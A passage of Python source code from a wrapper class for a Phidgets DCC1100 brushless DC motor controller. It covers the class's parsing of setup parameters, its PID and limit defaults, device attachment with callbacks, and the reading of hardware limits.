else:
self.GUI_COLUMNSPAN = 0
print("GUI_COLUMNSPAN = " + str(self.GUI_COLUMNSPAN))
##########################################
else:
self.GUIparametersDict = dict()
self.USE_GUI_FLAG = 0
print("No GUIparametersDict present, setting USE_GUI_FLAG = " + str(self.USE_GUI_FLAG))
print("GUIparametersDict = " + str(self.GUIparametersDict))
##########################################
##########################################
##########################################
if "UsePhidgetsLoggingInternalToThisClassObjectFlag" in setup_dict:
self.UsePhidgetsLoggingInternalToThisClassObjectFlag = self.PassThrough0and1values_ExitProgramOtherwise("UsePhidgetsLoggingInternalToThisClassObjectFlag", setup_dict["UsePhidgetsLoggingInternalToThisClassObjectFlag"])
else:
self.UsePhidgetsLoggingInternalToThisClassObjectFlag = 1
print("UsePhidgetsLoggingInternalToThisClassObjectFlag: " + str(self.UsePhidgetsLoggingInternalToThisClassObjectFlag))
##########################################
##########################################
if "WaitForAttached_TimeoutDuration_Milliseconds" in setup_dict:
self.WaitForAttached_TimeoutDuration_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("WaitForAttached_TimeoutDuration_Milliseconds", setup_dict["WaitForAttached_TimeoutDuration_Milliseconds"], 0.0, 60000.0))
else:
self.WaitForAttached_TimeoutDuration_Milliseconds = 5000
print("WaitForAttached_TimeoutDuration_Milliseconds: " + str(self.WaitForAttached_TimeoutDuration_Milliseconds))
##########################################
#########################################################
if "VINT_DesiredSerialNumber" in setup_dict:
try:
self.VINT_DesiredSerialNumber = int(setup_dict["VINT_DesiredSerialNumber"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR:: VINT_DesiredSerialNumber invalid.")
else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'VINT_DesiredSerialNumber' argument.")
return
print("VINT_DesiredSerialNumber: " + str(self.VINT_DesiredSerialNumber))
#########################################################
#########################################################
if "VINT_DesiredPortNumber" in setup_dict:
try:
self.VINT_DesiredPortNumber = int(setup_dict["VINT_DesiredPortNumber"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR:: VINT_DesiredPortNumber invalid.")
else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'VINT_DesiredPortNumber' argument.")
return
print("VINT_DesiredPortNumber: " + str(self.VINT_DesiredPortNumber))
#########################################################
#########################################################
if "DesiredDeviceID" in setup_dict:
try:
self.DesiredDeviceID = int(setup_dict["DesiredDeviceID"])
except:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: DesiredDeviceID invalid.")
else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'DesiredDeviceID' argument.")
return
print("DesiredDeviceID: " + str(self.DesiredDeviceID))
#########################################################
#########################################################
if "NameToDisplay_UserSet" in setup_dict:
self.NameToDisplay_UserSet = str(setup_dict["NameToDisplay_UserSet"])
else:
self.NameToDisplay_UserSet = ""
print("NameToDisplay_UserSet: " + str(self.NameToDisplay_UserSet))
#########################################################
##########################################
if "MainThread_TimeToSleepEachLoop" in setup_dict:
self.MainThread_TimeToSleepEachLoop = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("MainThread_TimeToSleepEachLoop", setup_dict["MainThread_TimeToSleepEachLoop"], 0.001, 100000)
else:
self.MainThread_TimeToSleepEachLoop = 0.005
print("MainThread_TimeToSleepEachLoop: " + str(self.MainThread_TimeToSleepEachLoop))
##########################################
#########################################################
if "ENABLE_GETS_MAINTHREAD" in setup_dict:
self.ENABLE_GETS_MAINTHREAD = int(setup_dict["ENABLE_GETS_MAINTHREAD"])
if self.ENABLE_GETS_MAINTHREAD != 0 and self.ENABLE_GETS_MAINTHREAD != 1:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: ENABLE_GETS_MAINTHREAD in setup dict must be 0 or 1.")
return
else:
self.ENABLE_GETS_MAINTHREAD = 0
print("ENABLE_GETS_MAINTHREAD: " + str(self.ENABLE_GETS_MAINTHREAD))
#########################################################
#########################################################
if "ControlMode" in setup_dict:
self.ControlMode = str(setup_dict["ControlMode"]).lower()
if self.ControlMode != "position" and self.ControlMode != "velocity":
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: ControlMode in setup dict must be 'position' or 'velocity'.")
return
else:
self.ControlMode = "velocity"
print("ControlMode: " + self.ControlMode)
#########################################################
##########################################
if "UpdateDeltaT_ms" in setup_dict:
if self.ControlMode == "position":
self.UpdateDeltaT_ms = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("UpdateDeltaT_ms", setup_dict["UpdateDeltaT_ms"], 20.0, 60000.0))
elif self.ControlMode == "velocity":
self.UpdateDeltaT_ms = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("UpdateDeltaT_ms", setup_dict["UpdateDeltaT_ms"], 100.0, 60000.0))
else:
if self.ControlMode == "position":
self.UpdateDeltaT_ms = int(20.0)
elif self.ControlMode == "velocity":
self.UpdateDeltaT_ms = int(100.0)
print("UpdateDeltaT_ms: " + str(self.UpdateDeltaT_ms))
##########################################
##########################################
if "FailsafeTime_Milliseconds" in setup_dict:
self.FailsafeTime_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("FailsafeTime_Milliseconds", setup_dict["FailsafeTime_Milliseconds"], 500.0, 30000.0))
else:
if self.ControlMode == "position":
self.FailsafeTime_Milliseconds = int(1000.0)
print("FailsafeTime_Milliseconds: " + str(self.FailsafeTime_Milliseconds))
##########################################
#########################################################
if "PositionMinLimit_PhidgetsUnits_UserSet" in setup_dict:
self.PositionMinLimit_PhidgetsUnits_UserSet = setup_dict["PositionMinLimit_PhidgetsUnits_UserSet"]
else:
self.PositionMinLimit_PhidgetsUnits_UserSet = -7.24637681159e+12
print("PositionMinLimit_PhidgetsUnits_UserSet: " + str(self.PositionMinLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "PositionMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
self.PositionMaxLimit_PhidgetsUnits_UserSet = setup_dict["PositionMaxLimit_PhidgetsUnits_UserSet"]
else:
self.PositionMaxLimit_PhidgetsUnits_UserSet = 7.24637681159e+12
print("PositionMaxLimit_PhidgetsUnits_UserSet: " + str(self.PositionMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if self.PositionMaxLimit_PhidgetsUnits_UserSet < self.PositionMinLimit_PhidgetsUnits_UserSet:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: PositionMinLimit_PhidgetsUnits_UserSet must be smaller than PositionMaxLimit_PhidgetsUnits_UserSet!")
return
#########################################################
#########################################################
if "VelocityMinLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
if setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], 0.0, 10000.0)
else:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], -10000.0, 0.0)
elif self.ControlMode == "velocity":
if setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], 0.0, 1.0)
else:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], -1.0, 0.0)
else:
if self.ControlMode == "position":
self.VelocityMinLimit_PhidgetsUnits_UserSet = -10000.0
elif self.ControlMode == "velocity":
self.VelocityMinLimit_PhidgetsUnits_UserSet = -1.0
print("VelocityMinLimit_PhidgetsUnits_UserSet: " + str(self.VelocityMinLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "VelocityMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
if setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], 0.0, 10000.0)
else:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], -10000.0, 0.0)
elif self.ControlMode == "velocity":
if setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], 0.0, 1.0)
else:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], -1.0, 0.0)
else:
if self.ControlMode == "position":
self.VelocityMaxLimit_PhidgetsUnits_UserSet = 10000.0
elif self.ControlMode == "velocity":
self.VelocityMaxLimit_PhidgetsUnits_UserSet = 1.0
print("VelocityMaxLimit_PhidgetsUnits_UserSet: " + str(self.VelocityMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if self.VelocityMaxLimit_PhidgetsUnits_UserSet < self.VelocityMinLimit_PhidgetsUnits_UserSet:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: VelocityMinLimit_PhidgetsUnits_UserSet must be smaller than VelocityMaxLimit_PhidgetsUnits_UserSet!")
return
#########################################################
#########################################################
if "VelocityStallLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
self.VelocityStallLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityStallLimit_PhidgetsUnits_UserSet", setup_dict["VelocityStallLimit_PhidgetsUnits_UserSet"], 0.0, 2000.0)
elif self.ControlMode == "velocity":
self.VelocityStallLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityStallLimit_PhidgetsUnits_UserSet", setup_dict["VelocityStallLimit_PhidgetsUnits_UserSet"], 0.0, 2000.0)
else:
if self.ControlMode == "position":
self.VelocityStallLimit_PhidgetsUnits_UserSet = 2000.0
elif self.ControlMode == "velocity":
self.VelocityStallLimit_PhidgetsUnits_UserSet = 2000.0
print("VelocityStallLimit_PhidgetsUnits_UserSet: " + str(self.VelocityStallLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "BrakingStrengthLimit_VelControl_Percent_UserSet" in setup_dict:
self.BrakingStrengthLimit_VelControl_Percent_UserSet = float(setup_dict["BrakingStrengthLimit_VelControl_Percent_UserSet"])
if self.BrakingStrengthLimit_VelControl_Percent_UserSet < 0.0 or self.BrakingStrengthLimit_VelControl_Percent_UserSet > 100.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: BrakingStrengthLimit_VelControl_Percent_UserSet must be between 0.0 an 100.0 percent.")
return
else:
self.BrakingStrengthLimit_VelControl_Percent_UserSet = 50.0
print("BrakingStrengthLimit_VelControl_Percent_UserSet: " + str(self.BrakingStrengthLimit_VelControl_Percent_UserSet))
#########################################################
#########################################################
if "DeadBand_PosControl_PhidgetsUnits_UserSet" in setup_dict:
self.DeadBand_PosControl_PhidgetsUnits_UserSet = float(setup_dict["DeadBand_PosControl_PhidgetsUnits_UserSet"])
if self.DeadBand_PosControl_PhidgetsUnits_UserSet < 0.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: self.DeadBand_PosControl_PhidgetsUnits_UserSet must be grater than 0.")
return
else:
self.DeadBand_PosControl_PhidgetsUnits_UserSet = 0.0
print("DeadBand_PosControl_PhidgetsUnits_UserSet: " + str(self.DeadBand_PosControl_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "AccelerationMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("AccelerationMaxLimit_PhidgetsUnits_UserSet", setup_dict["AccelerationMaxLimit_PhidgetsUnits_UserSet"], 0.1, 100000.0)
elif self.ControlMode == "velocity":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("AccelerationMaxLimit_PhidgetsUnits_UserSet", setup_dict["AccelerationMaxLimit_PhidgetsUnits_UserSet"], 0.1, 100.0)
else:
if self.ControlMode == "position":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = 50000.0
elif self.ControlMode == "velocity":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = 50.0
print("AccelerationMaxLimit_PhidgetsUnits_UserSet: " + str(self.AccelerationMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "Kp_PosControl_Gain_UserSet" in setup_dict:
self.Kp_PosControl_Gain_UserSet = float(setup_dict["Kp_PosControl_Gain_UserSet"])
else:
self.Kp_PosControl_Gain_UserSet = 20000.0
print("Kp_PosControl_Gain_UserSet: " + str(self.Kp_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "Ki_PosControl_Gain_UserSet" in setup_dict:
self.Ki_PosControl_Gain_UserSet = float(setup_dict["Ki_PosControl_Gain_UserSet"])
else:
self.Ki_PosControl_Gain_UserSet = 2.0
print("Ki_PosControl_Gain_UserSet: " + str(self.Ki_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "Kd_PosControl_Gain_UserSet" in setup_dict:
self.Kd_PosControl_Gain_UserSet = float(setup_dict["Kd_PosControl_Gain_UserSet"])
else:
self.Kd_PosControl_Gain_UserSet = 40000.0
print("Kd_PosControl_Gain_UserSet: " + str(self.Kd_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "RescaleFactor_MultipliesPhidgetsUnits_UserSet" in setup_dict:
self.RescaleFactor_MultipliesPhidgetsUnits_UserSet = float(setup_dict["RescaleFactor_MultipliesPhidgetsUnits_UserSet"])
if self.RescaleFactor_MultipliesPhidgetsUnits_UserSet < 0.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: self.RescaleFactor_MultipliesPhidgetsUnits_UserSet must be grater than 0.")
return
else:
self.RescaleFactor_MultipliesPhidgetsUnits_UserSet = 1.0
print("RescaleFactor_MultipliesPhidgetsUnits_UserSet: " + str(self.RescaleFactor_MultipliesPhidgetsUnits_UserSet))
print("-----------------------------------------------------------------------"
"\nFROM PHIDGETS BRUSHLESS DC MOTOR CONTROLLER USER'S GUIDE:"
"\nInstead of steps, brushless DC motors work in commutations. "
"\nThe number of commutations per rotation is equal to the number of poles multiplied by the number of phases. "
"\nSo, if you have an 8-Pole, 3-Phase motor, the motor will have 24 commutations per rotation. "
"\nFor this motor, to change the target position units from communications to rotations, you would set the rescale factor to 1/24, or 0.0416."
"\n-----------------------------------------------------------------------")
#########################################################
#########################################################
self.PrintToGui_Label_TextInputHistory_List = [" "]*self.NumberOfPrintLines
self.PrintToGui_Label_TextInput_Str = ""
self.GUI_ready_to_be_updated_flag = 0
#########################################################
#########################################################
self.CurrentTime_CalculatedFromMainThread = -11111.0
self.LastTime_CalculatedFromMainThread = -11111.0
self.StartingTime_CalculatedFromMainThread = -11111.0
self.DataStreamingFrequency_CalculatedFromMainThread = -11111.0
self.DataStreamingDeltaT_CalculatedFromMainThread = -11111.0
self.CurrentTime_OnPositionChangeCallbackFunction = -11111.0
self.LastTime_OnPositionChangeCallbackFunction = -11111.0
self.DataStreamingFrequency_OnPositionChangeCallbackFunction = -11111.0
self.DataStreamingDeltaT_OnPositionChangeCallbackFunction = -11111.0
self.LastTime_FailsafeWasReset = -11111.0
self.DetectedDeviceName = "default"
self.DetectedDeviceID = "default"
self.DetectedDeviceVersion = "default"
self.StopMotor_NeedsToBeChangedFlag = 0
self.Temperature_DegC_FromDevice = -11111.0
self.Position_PhidgetsUnits_FromDevice = -11111.0
self.Position_PhidgetsUnits_FromDevice_Last = -11111.0
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.VelocityStall_PhidgetsUnits_FromDevice = -11111.0
self.Velocity_PhidgetsUnits_FromDevice = -11111.0
self.Velocity_PhidgetsUnits_TO_BE_SET = 0.0
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_DifferentiatedRaw = -11111.0
self.Velocity_PhidgetsUnits_DifferentiatedSmoothed = -11111.0
self.DutyCycle_PhidgetsUnits_FromDevice = -11111
self.Acceleration_PhidgetsUnits_FromDevice = -11111
self.Acceleration_PhidgetsUnits_TO_BE_SET = 0.0
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = -11111
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = 0.0
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 0
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
self.EngagedState_PhidgetsUnits_FromDevice = -11111
self.EngagedState_TO_BE_SET = -1
self.EngagedState_NeedsToBeChangedFlag = 0
self.HomeMotorInPlace_NeedsToBeHomedFlag = 0
self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0
#########################################################
#########################################################
try:
self.Velocity_LowPassFilter_ReubenPython2and3ClassObject = LowPassFilter_ReubenPython2and3Class(dict([("UseMedianFilterFlag", 0),
("UseExponentialSmoothingFilterFlag", 1),
("ExponentialSmoothingFilterLambda", 0.2)]))
time.sleep(0.1)
self.VELOCITY_LOWPASSFILTER_OPEN_FLAG = self.Velocity_LowPassFilter_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
if self.LOWPASSFILTER_OPEN_FLAG != 1:
print("Failed to open LowPassFilter_ReubenPython2and3ClassObject.")
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
return
except:
exceptions = sys.exc_info()[0]
print("LowPassFilter_ReubenPython2and3Class __init__: Exceptions: %s" % exceptions)
#########################################################
#########################################################
self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet = 0.01 * self.BrakingStrengthLimit_VelControl_Percent_UserSet * 1.0 #self.BrakingStrengthStallLimit_PhidgetsUnits_FromDevice
print("BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet: " + str(self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet))
#########################################################
#########################################################
try:
self.TemperatureObject = TemperatureSensor()
print("Created TemperatureSensor object.")
if self.ControlMode == "velocity":
self.BLDCobject = BLDCMotor() #Create a BLDCMotor object for velocity control
print("Created BLDCMotor object.")
elif self.ControlMode == "position":
self.BLDCobject = MotorPositionController() #Create a MotorPositionController object for position control
print("Created MotorPositionController object.")
except PhidgetException as e:
print("Failed to create main motor object, exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.BLDCobject.setDeviceSerialNumber(self.VINT_DesiredSerialNumber)
except PhidgetException as e:
print("Failed to call 'setDeviceSerialNumber()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.BLDCobject.setHubPort(self.VINT_DesiredPortNumber)
except PhidgetException as e:
print("Failed to call 'setHubPort()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.TemperatureObject.setOnAttachHandler(self.TemperatureOnAttachCallback)
self.TemperatureObject.setOnDetachHandler(self.TemperatureOnDetachCallback)
self.TemperatureObject.setOnTemperatureChangeHandler(self.TemperatureOnChangeCallback)
self.TemperatureObject.setOnErrorHandler(self.TemperatureOnErrorCallback)
if self.ControlMode == "velocity":
self.BLDCobject.setOnAttachHandler(self.BLDConAttachCallback)
self.BLDCobject.setOnDetachHandler(self.BLDConDetachCallback)
self.BLDCobject.setOnVelocityUpdateHandler(self.BLDConVelocityUpdateCallback)
self.BLDCobject.setOnPositionChangeHandler(self.BLDConPositionChangeCallback)
self.BLDCobject.setOnErrorHandler(self.BLDConErrorCallback)
elif self.ControlMode == "position":
self.BLDCobject.setOnAttachHandler(self.BLDConAttachCallback)
self.BLDCobject.setOnDetachHandler(self.BLDConDetachCallback)
self.BLDCobject.setOnDutyCycleUpdateHandler(self.BLDConDutyCycleUpdateCallback)
self.BLDCobject.setOnPositionChangeHandler(self.BLDConPositionChangeCallback)
self.BLDCobject.setOnErrorHandler(self.BLDConErrorCallback)
print("Set callback functions.")
self.BLDCobject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
self.TemperatureObject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
self.device_connected_flag = 1
print("Attached the BLDC object.")
except PhidgetException as e:
self.device_connected_flag = 0
print("Failed to call 'openWaitForAttachment()', exception: %i: %s" % (e.code, e.details))
try:
self.BLDCobject.close()
print("Closed the BLDC object.")
except PhidgetException as e:
print("Failed to call 'close()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
#########################################################
if self.device_connected_flag == 1:
#########################################################
if self.UsePhidgetsLoggingInternalToThisClassObjectFlag == 1:
try:
Log.enable(LogLevel.PHIDGET_LOG_INFO, os.getcwd() + "\PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class_PhidgetLog_INFO.txt")
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__Enabled Phidget Logging.")
except PhidgetException as e:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__Failed to enable Phidget Logging, Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceName = self.BLDCobject.getDeviceName()
print("DetectedDeviceName: " + self.DetectedDeviceName)
except PhidgetException as e:
print("Failed to call 'getDeviceName', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.VINT_DetectedSerialNumber = self.BLDCobject.getDeviceSerialNumber()
print("VINT_DetectedSerialNumber: " + str(self.VINT_DetectedSerialNumber))
except PhidgetException as e:
print("Failed to call 'getDeviceSerialNumber', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceID = self.BLDCobject.getDeviceID()
print("DetectedDeviceID: " + str(self.DetectedDeviceID))
except PhidgetException as e:
print("Failed to call 'getDeviceID', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceVersion = self.BLDCobject.getDeviceVersion()
print("DetectedDeviceVersion: " + str(self.DetectedDeviceVersion))
except PhidgetException as e:
print("Failed to call 'getDeviceVersion', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceLibraryVersion = self.BLDCobject.getLibraryVersion()
print("DetectedDeviceLibraryVersion: " + str(self.DetectedDeviceLibraryVersion))
except PhidgetException as e:
print("Failed to call 'getLibraryVersion', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
if self.VINT_DetectedSerialNumber != self.VINT_DesiredSerialNumber:
print("The desired VINT_DesiredSerialNumber (" + str(self.VINT_DesiredSerialNumber) + ") does not match the detected serial number (" + str(self.VINT_DetectedSerialNumber) + ").")
input("Press any key (and enter) to exit.")
sys.exit()
#########################################################
#########################################################
if self.DetectedDeviceID != self.DesiredDeviceID:
print("The DesiredDeviceID (" + str(self.DesiredDeviceID) + ") does not match the detected Device ID (" + str(self.DetectedDeviceID) + ").")
input("Press any key (and enter) to exit.")
sys.exit()
#########################################################
#########################################################
try:
############################
self.FailsafeTimeMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinFailsafeTime()
print("FailsafeTimeMinLimit_PhidgetsUnits_FromDevice: " + str(self.FailsafeTimeMinLimit_PhidgetsUnits_FromDevice))
self.FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxFailsafeTime()
print("FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice: " + str(self.FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.PositionMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinPosition()
print("PositionMinLimit_PhidgetsUnits_FromDevice: " + str(self.PositionMinLimit_PhidgetsUnits_FromDevice))
self.PositionMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxPosition()
print("PositionMaxLimit_PhidgetsUnits_FromDevice: " + str(self.PositionMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
if self.ControlMode == "velocity":
self.VelocityMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinVelocity()
self.VelocityMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxVelocity()
elif self.ControlMode == "position":
self.VelocityMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinVelocityLimit()
self.VelocityMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxVelocityLimit()
print("VelocityMinLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMinLimit_PhidgetsUnits_FromDevice))
print("VelocityMaxLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.VelocityMinStallLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinStallVelocity()
self.VelocityMaxStallLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxStallVelocity()
print("VelocityMinStallLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMinStallLimit_PhidgetsUnits_FromDevice))
print("VelocityMaxStallLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMaxStallLimit_PhidgetsUnits_FromDevice))
############################
############################
self.AccelerationMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinAcceleration()
print("AccelerationMinLimit_PhidgetsUnits_FromDevice: " + str(self.AccelerationMinLimit_PhidgetsUnits_FromDevice))
self.AccelerationMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxAcceleration()
print("AccelerationMaxLimit_PhidgetsUnits_FromDevice: " + str(self.AccelerationMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.DataIntervalMin = self.BLDCobject.getMinDataInterval()
print("DataIntervalMin: " + str(self.DataIntervalMin))
self.DataIntervalMax = self.BLDCobject.getMaxDataInterval()
print("DataIntervalMax: " + str(self.DataIntervalMax))
############################
############################
if self.ControlMode == "velocity":
self.BrakingStrengthMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinBrakingStrength()
self.BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxBrakingStrength()
print("BrakingStrengthMinLimit_PhidgetsUnits_FromDevice: " + str(self.BrakingStrengthMinLimit_PhidgetsUnits_FromDevice))
print("BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice: " + str(self.BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice))
############################
except PhidgetException as e:
print("Failed to motor limits, Phidget Exception %i: %s" % (e.code, e.details))
traceback.print_exc()
return
self.MostRecentDataDict = dict([("Position_PhidgetsUnits_FromDevice", self.Position_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_FromDevice", self.Velocity_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_DifferentiatedRaw", self.Velocity_PhidgetsUnits_DifferentiatedRaw),
("Velocity_PhidgetsUnits_DifferentiatedSmoothed", self.Velocity_PhidgetsUnits_DifferentiatedSmoothed),
("DutyCycle_PhidgetsUnits_FromDevice", self.DutyCycle_PhidgetsUnits_FromDevice),
("Temperature_DegC_FromDevice", self.Temperature_DegC_FromDevice),
("Time", self.CurrentTime_CalculatedFromMainThread)])
#########################################################
##########################################
self.MainThread_ThreadingObject = threading.Thread(target=self.MainThread, args=())
self.MainThread_ThreadingObject.start()
##########################################
##########################################
if self.USE_GUI_FLAG == 1:
self.StartGUI(self.root)
##########################################
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 1
else:
print("---------- Failed to open PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class for serial number " + str(self.VINT_DesiredSerialNumber) + " ----------")
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
return
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def __del__(self):
pass
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
